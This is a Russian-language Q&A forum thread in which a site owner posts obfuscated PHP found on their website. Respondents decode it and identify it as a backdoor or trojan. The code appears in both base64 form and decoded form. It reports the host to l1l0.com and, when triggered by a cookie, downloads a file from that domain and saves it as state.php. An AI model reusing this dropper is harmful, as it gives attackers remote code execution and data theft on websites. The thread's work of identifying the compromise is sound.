Задать вопрос
ProgerAN
@ProgerAN

Php код на сайте?

Я php не особо силен но не могли бы вы мне помочь что это за код
if (!isset($_COOKIE[base64_decode('X3ltX2l1cw==')])) { @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL3Av').$_SERVER['HTTP_HOST']); @setcookie(base64_decode('X3ltX2l1cw=='), 1, time()+31536000, '/', $_SERVER['HTTP_HOST']); } if (isset($_COOKIE[base64_decode('cmVkNHU=')])) { @file_put_contents(base64_decode('c3RhdGUucGhw'), @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL2QudHh0'))); }
  • Вопрос задан
  • 342 просмотра
Подписаться 1 Средний Комментировать
Решения вопроса 1
@BorisKorobkov Куратор тега PHP
Web developer
Бэкдор это. Вас взломали.

if (!isset($_COOKIE['_ym_ius'])) {
	@file_get_contents('http://l1l0.com/p/' . $_SERVER['HTTP_HOST']);
	@setcookie('_ym_ius', 1, time() + 31536000, '/', $_SERVER['HTTP_HOST']);
}

if (isset($_COOKIE['red4u'])) {
	@file_put_contents('state.php', @file_get_contents('http://l1l0.com/d.txt'));
}
Ответ написан
Пригласить эксперта
Ответы на вопрос 1
@l4m3r
Троян. Скачивает какой-то php с l1l0.com/p чтобы затем мамкин хакер мог выполнить его по прямой ссылке. А там, скорей всего, воровство файлов твоих и паролей или еще чего.
Глянь код этого state.php
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы